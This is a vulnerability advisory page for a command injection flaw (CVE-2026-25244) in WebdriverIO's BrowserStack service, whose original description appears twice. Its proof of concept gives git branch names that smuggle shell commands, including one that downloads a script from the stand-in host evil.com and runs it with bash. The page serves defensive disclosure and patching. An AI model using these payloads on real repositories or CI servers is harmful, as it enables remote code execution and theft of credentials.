Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
9.8
CVE-2026-25244: WebdriverIO BrowserStack Service allows malicious code execution
GHSA-5c46-x3qw-q7j7
CVE-2026-25244
Summary
A vulnerability in WebdriverIO's BrowserStack Service allows attackers to execute malicious code when processing git branch names in test orchestration. This can happen if an attacker creates a malicious git repository with a branch name containing malicious commands. To fix this, ensure that you're using a trusted git repository and configure the service to use a secure source.
What to do
- Update wdio browserstack-service to version 9.24.0.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | wdio | browserstack-service |
<= 9.23.2 Fix: upgrade to 9.24.0
|
| – | openjsf | webdriverio |
< 9.24.0 cpe:2.3:a:openjsf:webdriverio:*:*:*:*:*:node.js:*:* |
Original title
WebdriverIO BrowserStack Service has a Command Injection issue
Original description
### Summary
A command injection vulnerability exists in `@wdio/browserstack-service` that allows remote code execution (RCE) when processing git branch names in test orchestration. An attacker can exploit this by providing a malicious git repository with a branch name containing shell command injection payloads.
### Details
_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._
### Vulnerable Code
**File**: https://github.com/webdriverio/webdriverio/blob/ea0e3e00288abced4c739ff9e46c46977b7cdbd2/packages/wdio-browserstack-service/src/testorchestration/helpers.ts#L204
### Root Cause
User-controlled git branch names are directly interpolated into `execSync()` calls without sanitization. Git allows branch names to contain special characters ,that can be used for command injection.
Git allows to create these branches.
```
git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
git checkout -b "main;rm\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
git checkout -b "main;curl\${IFS}evil.com/evil.sh\${IFS}>/tmp/evil.sh;bash\${IFS}/tmp/evil.sh;echo\${IFS}PWNED"
```
### Attack Vector
1. Attacker creates a malicious git repository with a branch name containing command injection payload
2. Attacker configures WebdriverIO to use this repository via `testOrchestrationOptions.runSmartSelection.source`. if `source` is not provided it takes current directory as `source`.
3. When `getGitMetadataForAISelection()` executes, it extracts the malicious branch name
4. Branch name is interpolated into shell commands without sanitization
5. Shell interprets special characters and executes attacker's commands
### PoC
### Step 1: Create Malicious Repository Branch
```
git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
```
### Step 2: Configure WebdriverIO
```javascript
// wdio.conf.js
export const config = {
services: [
['browserstack', {
user: process.env.BROWSERSTACK_USERNAME,
key: process.env.BROWSERSTACK_ACCESS_KEY,
testOrchestrationOptions: {
runSmartSelection: {
enabled: true,
source: ['/tmp/malicious-repo'] // ⚠️ Points to malicious repo, without "source" field, it runs in the current directory.
}
}
}]
],
// ... rest of config
}
```
### Step 3: Run Tests
```bash
npm run wdio
```
### Step 4: Verify RCE
```bash
# Check if file was created (proof of RCE)
ls -la /tmp/pwned.txt
```
### Impact
- **Remote Code Execution** on CI/CD servers or developer machines
- **Information Disclosure** (environment variables, secrets, credentials)
- **Data Exfiltration** (source code, SSH keys, configuration files)
- **System Compromise** (backdoor installation, lateral movement)
- **Supply Chain Attack** (modify build artifacts)
A command injection vulnerability exists in `@wdio/browserstack-service` that allows remote code execution (RCE) when processing git branch names in test orchestration. An attacker can exploit this by providing a malicious git repository with a branch name containing shell command injection payloads.
### Details
_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._
### Vulnerable Code
**File**: https://github.com/webdriverio/webdriverio/blob/ea0e3e00288abced4c739ff9e46c46977b7cdbd2/packages/wdio-browserstack-service/src/testorchestration/helpers.ts#L204
### Root Cause
User-controlled git branch names are directly interpolated into `execSync()` calls without sanitization. Git allows branch names to contain special characters ,that can be used for command injection.
Git allows to create these branches.
```
git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
git checkout -b "main;rm\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
git checkout -b "main;curl\${IFS}evil.com/evil.sh\${IFS}>/tmp/evil.sh;bash\${IFS}/tmp/evil.sh;echo\${IFS}PWNED"
```
### Attack Vector
1. Attacker creates a malicious git repository with a branch name containing command injection payload
2. Attacker configures WebdriverIO to use this repository via `testOrchestrationOptions.runSmartSelection.source`. if `source` is not provided it takes current directory as `source`.
3. When `getGitMetadataForAISelection()` executes, it extracts the malicious branch name
4. Branch name is interpolated into shell commands without sanitization
5. Shell interprets special characters and executes attacker's commands
### PoC
### Step 1: Create Malicious Repository Branch
```
git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
```
### Step 2: Configure WebdriverIO
```javascript
// wdio.conf.js
export const config = {
services: [
['browserstack', {
user: process.env.BROWSERSTACK_USERNAME,
key: process.env.BROWSERSTACK_ACCESS_KEY,
testOrchestrationOptions: {
runSmartSelection: {
enabled: true,
source: ['/tmp/malicious-repo'] // ⚠️ Points to malicious repo, without "source" field, it runs in the current directory.
}
}
}]
],
// ... rest of config
}
```
### Step 3: Run Tests
```bash
npm run wdio
```
### Step 4: Verify RCE
```bash
# Check if file was created (proof of RCE)
ls -la /tmp/pwned.txt
```
### Impact
- **Remote Code Execution** on CI/CD servers or developer machines
- **Information Disclosure** (environment variables, secrets, credentials)
- **Data Exfiltration** (source code, SSH keys, configuration files)
- **System Compromise** (backdoor installation, lateral movement)
- **Supply Chain Attack** (modify build artifacts)
ghsa CVSS3.1
9.8
Vulnerability type
CWE-78
OS Command Injection
- https://github.com/advisories/GHSA-5c46-x3qw-q7j7
- https://github.com/webdriverio/webdriverio/security/advisories/GHSA-5c46-x3qw-q7...
- https://github.com/webdriverio/webdriverio/blob/ea0e3e00288abced4c739ff9e46c4697...
- https://github.com/webdriverio/webdriverio/releases/tag/v9.24.0
- https://nvd.nist.gov/vuln/detail/CVE-2026-25244
Published: 11 May 2026 · Updated: 28 May 2026 · First seen: 11 May 2026